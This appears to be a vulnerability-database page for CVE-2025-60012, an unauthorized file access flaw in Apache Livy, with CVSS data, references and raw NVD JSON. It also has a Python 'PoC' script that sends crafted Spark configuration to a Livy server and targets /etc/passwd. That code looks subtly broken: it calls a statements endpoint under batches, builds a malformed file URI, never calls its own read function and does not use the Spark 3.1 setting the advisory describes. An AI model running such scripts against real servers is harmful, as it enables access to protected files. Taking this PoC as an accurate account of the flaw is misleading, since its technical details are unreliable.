Security Vulnerability Report
CVE-2025-60012 CVSS 6.3 MEDIUM

CVE-2025-60012

Published: 2026-03-13 19:53:53
Last Modified: 2026-03-19 17:46:31

Description

Malicious configuration can lead to unauthorized file access in Apache Livy. This issue affects Apache Livy 0.7.0 and 0.8.0 when connecting to Apache Spark 3.1 or later. A request that includes a Spark configuration value supported from Apache Spark version 3.1 can lead to users gaining access to files they do not have permissions to. For the vulnerability to be exploitable, the user needs to have access to Apache Livy's REST or JDBC interface and be able to send requests with arbitrary Spark configuration values. Users are recommended to upgrade to version 0.9.0 or later, which fixes the issue.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:apache:livy:*:*:*:*:*:*:*:* - VULNERABLE (versions from 0.7.0 up to, but excluding, 0.9.0)
Apache Livy 0.7.0
Apache Livy 0.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-60012 PoC - Apache Livy Unauthorized File Access
# Target: Apache Livy 0.7.0/0.8.0 with Spark 3.1+


def exploit_livy(target_url, file_path):
    """
    Exploit malicious configuration leading to unauthorized file access
    """
    # Malicious Spark configuration to access arbitrary files
    payload = {
        "file": "file:///" + file_path,
        "conf": {
            "spark.hadoop.fs.defaultFS": "file:///",
            "spark.master": "local[*]"
        }
    }
    try:
        # Create new session with malicious config
        response = requests.post(
            f"{target_url}/batches",
            json=payload,
            headers={"Content-Type": "application/json"},
            timeout=30
        )
        if response.status_code == 200:
            result = response.json()
            print(f"[+] Batch created: {result.get('id')}")
            return result
        else:
            print(f"[-] Failed: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


def read_file_via_livy(target_url, batch_id, file_path):
    """
    Attempt to read file content through Livy session
    """
    code = f"sc.textFile('{file_path}').collect()"
    response = requests.post(
        f"{target_url}/batches/{batch_id}/statements",
        json={"code": code},
        headers={"Content-Type": "application/json"}
    )
    return response.json()


# Example usage
if __name__ == "__main__":
    target = "http://target-server:8998"
    target_file = "/etc/passwd"
    print(f"[*] Targeting: {target}")
    print(f"[*] Attempting to access: {target_file}")
    batch = exploit_livy(target, target_file)
```

References

- https://lists.apache.org/thread/gpc85fwrgrbglpk9gm8tmcjzqnctx64w (Mailing List, Vendor Advisory)
- http://www.openwall.com/lists/oss-security/2026/03/12/1 (Mailing List, Third Party Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-60012", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:52.530", "lastModified": "2026-03-19T17:46:30.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious configuration can lead to unauthorized file access in Apache Livy.\n\nThis issue affects Apache Livy 0.7.0 and 0.8.0 when connecting to Apache Spark 3.1 or later.\n\nA request that includes a Spark configuration value supported from Apache Spark version 3.1 can lead to users gaining access to files they do not have permissions to.\n\nFor the vulnerability to be exploitable, the user needs to have access to Apache Livy's REST or JDBC interface and be able to send requests with arbitrary Spark configuration values.\n\nUsers are recommended to upgrade to version 0.9.0 or later, which fixes the issue."}, {"lang": "es", "value": "La configuración maliciosa puede conducir a un acceso no autorizado a archivos en Apache Livy.\n\nEste problema afecta a Apache Livy 0.7.0 y 0.8.0 al conectarse a Apache Spark 3.1 o posterior.\n\nUna solicitud que incluye un valor de configuración de Spark compatible a partir de la versión 3.1 de Apache Spark puede llevar a que los usuarios obtengan acceso a archivos para los que no tienen permisos.\n\nPara que la vulnerabilidad sea explotable, el usuario necesita tener acceso a la interfaz REST o JDBC de Apache Livy y ser capaz de enviar solicitudes con valores de configuración de Spark arbitrarios.\n\nSe recomienda a los usuarios actualizar a la versión 0.9.0 o posterior, que soluciona el problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:livy:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.7.0", "versionEndExcluding": "0.9.0", "matchCriteriaId": "D283303C-634D-4FD2-A1E3-37079C6776C6"}]}]}], "references": [{"url": "https://lists.apache.org/thread/gpc85fwrgrbglpk9gm8tmcjzqnctx64w", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/12/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}
```